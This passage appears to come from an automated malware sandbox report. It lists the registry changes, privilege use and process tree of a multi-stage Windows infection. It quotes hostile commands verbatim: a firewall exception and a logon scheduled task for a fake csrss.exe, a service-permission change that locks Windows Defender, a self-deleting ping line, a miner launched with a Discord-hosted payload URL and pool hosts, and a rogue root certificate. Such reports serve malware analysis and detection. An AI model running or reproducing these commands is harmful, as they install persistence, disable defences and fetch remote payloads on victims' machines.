\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" 288c47bbc1871b439df19ff4df68f076.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2451 = "Saint Pierre Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2391 = "Aleutian Daylight Time" windefender.exe -
Processes:
propro.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 propro.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 propro.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exepid process 4104 01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe 4104 01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 3336 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3336 -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe20E.exe987123.exevufabtjpid process 4104 01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe 5072 20E.exe 1900 987123.exe 4428 vufabtj -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeGDHCGDGIEB.exe288c47bbc1871b439df19ff4df68f076.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeDebugPrivilege 1292 powershell.exe Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeDebugPrivilege 4612 GDHCGDGIEB.exe Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeDebugPrivilege 660 288c47bbc1871b439df19ff4df68f076.exe Token: SeImpersonatePrivilege 660 288c47bbc1871b439df19ff4df68f076.exe Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeDebugPrivilege 4580 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Token: SeDebugPrivilege 924 powershell.exe Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeDebugPrivilege 3740 powershell.exe Token: SeShutdownPrivilege 3336 Token: SeCreatePagefilePrivilege 3336 Token: SeDebugPrivilege 4000 powershell.exe -
Suspicious use of FindShellTrayWindow 14 IoCs
Processes:
u2o.1.exeu3g8.1.exepid process 780 u2o.1.exe 780 u2o.1.exe 780 u2o.1.exe 780 u2o.1.exe 780 u2o.1.exe 780 u2o.1.exe 780 u2o.1.exe 5480 u3g8.1.exe 5480 u3g8.1.exe 5480 u3g8.1.exe 5480 u3g8.1.exe 5480 u3g8.1.exe 5480 u3g8.1.exe 5480 u3g8.1.exe -
Suspicious use of SendNotifyMessage 14 IoCs
Processes:
u2o.1.exeu3g8.1.exepid process 780 u2o.1.exe 780 u2o.1.exe 780 u2o.1.exe 780 u2o.1.exe 780 u2o.1.exe 780 u2o.1.exe 780 u2o.1.exe 5480 u3g8.1.exe 5480 u3g8.1.exe 5480 u3g8.1.exe 5480 u3g8.1.exe 5480 u3g8.1.exe 5480 u3g8.1.exe 5480 u3g8.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
regsvr32.exe30D1.exeapril.exeEasyAppns.exeInstallSetup_four.exe288c47bbc1871b439df19ff4df68f076.exeu2o.0.execmd.exeGDHCGDGIEB.execmd.exeu2o.1.exe288c47bbc1871b439df19ff4df68f076.exedescription pid process target process PID 3336 wrote to memory of 5072 3336 20E.exe PID 3336 wrote to memory of 5072 3336 20E.exe PID 3336 wrote to memory of 5072 3336 20E.exe PID 3336 wrote to memory of 304 3336 regsvr32.exe PID 3336 wrote to memory of 304 3336 regsvr32.exe PID 304 wrote to memory of 4188 304 regsvr32.exe regsvr32.exe PID 304 wrote to memory of 4188 304 regsvr32.exe regsvr32.exe PID 304 wrote to memory of 4188 304 regsvr32.exe regsvr32.exe PID 3336 wrote to memory of 2896 3336 30D1.exe PID 3336 wrote to memory of 2896 3336 30D1.exe PID 3336 wrote to memory of 2896 3336 30D1.exe PID 2896 wrote to memory of 96 2896 30D1.exe InstallSetup_four.exe PID 2896 wrote to memory of 96 2896 30D1.exe InstallSetup_four.exe PID 2896 wrote to memory of 96 2896 30D1.exe InstallSetup_four.exe PID 2896 wrote to memory of 660 2896 30D1.exe 288c47bbc1871b439df19ff4df68f076.exe PID 2896 wrote to memory of 660 2896 30D1.exe 288c47bbc1871b439df19ff4df68f076.exe PID 2896 wrote to memory of 660 2896 30D1.exe 288c47bbc1871b439df19ff4df68f076.exe PID 2896 wrote to memory of 3068 2896 30D1.exe EasyAppns.exe PID 2896 wrote to memory of 3068 2896 30D1.exe EasyAppns.exe PID 2896 wrote to memory of 3068 2896 30D1.exe EasyAppns.exe PID 2896 wrote to memory of 4236 2896 30D1.exe april.exe PID 2896 wrote to memory of 4236 2896 30D1.exe april.exe PID 2896 wrote to memory of 4236 2896 30D1.exe april.exe PID 3336 wrote to memory of 3036 3336 3B90.exe PID 3336 wrote to memory of 3036 3336 3B90.exe PID 3336 wrote to memory of 3036 3336 3B90.exe PID 4236 wrote to memory of 2296 4236 april.exe april.tmp PID 4236 wrote to memory of 2296 4236 april.exe april.tmp PID 4236 wrote to memory of 2296 4236 april.exe april.tmp PID 3068 wrote to memory of 2228 3068 EasyAppns.exe EasyApp.exe PID 3068 wrote to memory of 2228 3068 EasyAppns.exe EasyApp.exe PID 3068 wrote to memory of 2228 3068 EasyAppns.exe EasyApp.exe PID 96 wrote to memory of 4176 96 InstallSetup_four.exe u2o.0.exe PID 96 wrote to memory of 4176 96 InstallSetup_four.exe u2o.0.exe PID 96 wrote to memory of 4176 96 InstallSetup_four.exe u2o.0.exe PID 660 wrote to memory of 1292 660 288c47bbc1871b439df19ff4df68f076.exe powershell.exe PID 660 wrote to memory of 1292 660 288c47bbc1871b439df19ff4df68f076.exe powershell.exe PID 660 wrote to memory of 1292 660 288c47bbc1871b439df19ff4df68f076.exe powershell.exe PID 3336 wrote to memory of 1256 3336 5822.exe PID 3336 wrote to memory of 1256 3336 5822.exe PID 3336 wrote to memory of 1256 3336 5822.exe PID 96 wrote to memory of 780 96 InstallSetup_four.exe u2o.1.exe PID 96 wrote to memory of 780 96 InstallSetup_four.exe u2o.1.exe PID 96 wrote to memory of 780 96 InstallSetup_four.exe u2o.1.exe PID 4176 wrote to memory of 3876 4176 u2o.0.exe cmd.exe PID 4176 wrote to memory of 3876 4176 u2o.0.exe cmd.exe PID 4176 wrote to memory of 3876 4176 u2o.0.exe cmd.exe PID 3876 wrote to memory of 4612 3876 cmd.exe GDHCGDGIEB.exe PID 3876 wrote to memory of 4612 3876 cmd.exe GDHCGDGIEB.exe PID 3876 wrote to memory of 4612 3876 cmd.exe GDHCGDGIEB.exe PID 4612 wrote to memory of 4864 4612 GDHCGDGIEB.exe cmd.exe PID 4612 wrote to memory of 4864 4612 GDHCGDGIEB.exe cmd.exe PID 4612 wrote to memory of 4864 4612 GDHCGDGIEB.exe cmd.exe PID 4864 wrote to memory of 520 4864 cmd.exe PING.EXE PID 4864 wrote to memory of 520 4864 cmd.exe PING.EXE PID 4864 wrote to memory of 520 4864 cmd.exe PING.EXE PID 780 wrote to memory of 4580 780 u2o.1.exe SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe PID 780 wrote to memory of 4580 780 u2o.1.exe SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe PID 3568 wrote to memory of 924 3568 288c47bbc1871b439df19ff4df68f076.exe powershell.exe PID 3568 wrote to memory of 924 3568 288c47bbc1871b439df19ff4df68f076.exe powershell.exe PID 3568 wrote to memory of 924 3568 288c47bbc1871b439df19ff4df68f076.exe powershell.exe PID 3336 wrote to memory of 2124 3336 B278.exe PID 3336 wrote to memory of 2124 3336 B278.exe PID 3336 wrote to memory of 1964 3336 BC1D.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe"C:\Users\Admin\AppData\Local\Temp\01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4104
-
C:\Users\Admin\AppData\Local\Temp\20E.exeC:\Users\Admin\AppData\Local\Temp\20E.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5072
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\905.dll1⤵
- Suspicious use of WriteProcessMemory
PID:304 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\905.dll2⤵
- Loads dropped DLL
PID:4188
-
-
C:\Users\Admin\AppData\Local\Temp\30D1.exeC:\Users\Admin\AppData\Local\Temp\30D1.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe"C:\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:96 -
C:\Users\Admin\AppData\Local\Temp\u2o.0.exe"C:\Users\Admin\AppData\Local\Temp\u2o.0.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GDHCGDGIEB.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Users\Admin\AppData\Local\Temp\GDHCGDGIEB.exe"C:\Users\Admin\AppData\Local\Temp\GDHCGDGIEB.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GDHCGDGIEB.exe6⤵
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30007⤵
- Runs ping.exe
PID:520
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\u2o.1.exe"C:\Users\Admin\AppData\Local\Temp\u2o.1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD14⤵
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1292
-
-
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"3⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:2236
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:4344
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4000
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:4856 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3740
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:64
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f5⤵PID:4596
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4000
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4944
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵
- Executes dropped EXE
PID:2620
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:4628
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"5⤵
- Executes dropped EXE
PID:2580 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵PID:5560
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
- Launches sc.exe
PID:5696
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5704
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:805⤵
- Executes dropped EXE
PID:5664
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:5588
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe5⤵PID:1216
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:2640
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe5⤵PID:2708
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\EasyAppns.exe"C:\Users\Admin\AppData\Local\Temp\EasyAppns.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Users\Public\Music\EasyApp.exe"C:\Users\Public\Music\EasyApp.exe"3⤵
- Executes dropped EXE
PID:2228 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 9844⤵
- Program crash
PID:2904
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\april.exe"C:\Users\Admin\AppData\Local\Temp\april.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Users\Admin\AppData\Local\Temp\is-OB1P9.tmp\april.tmp"C:\Users\Admin\AppData\Local\Temp\is-OB1P9.tmp\april.tmp" /SL5="$600D0,1485356,54272,C:\Users\Admin\AppData\Local\Temp\april.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2296
-
-
-
C:\Users\Admin\AppData\Local\Temp\3B90.exeC:\Users\Admin\AppData\Local\Temp\3B90.exe1⤵
- Executes dropped EXE
PID:3036 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 10082⤵
- Program crash
PID:2664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 10082⤵
- Program crash
PID:4656
-
-
C:\Users\Admin\AppData\Local\Temp\5822.exeC:\Users\Admin\AppData\Local\Temp\5822.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
PID:1256
-
C:\Users\Admin\AppData\Local\Temp\B278.exeC:\Users\Admin\AppData\Local\Temp\B278.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2124 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe2⤵PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\BC1D.exeC:\Users\Admin\AppData\Local\Temp\BC1D.exe1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:1964
-
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exeC:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:3524 -
C:\Users\Admin\AppData\Local\Temp\1000836001\osminog.exe"C:\Users\Admin\AppData\Local\Temp\1000836001\osminog.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4116 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3532 -s 11724⤵
- Program crash
PID:2628
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000837001\goldprimeldlldf.exe"C:\Users\Admin\AppData\Local\Temp\1000837001\goldprimeldlldf.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1592 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2612
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"2⤵
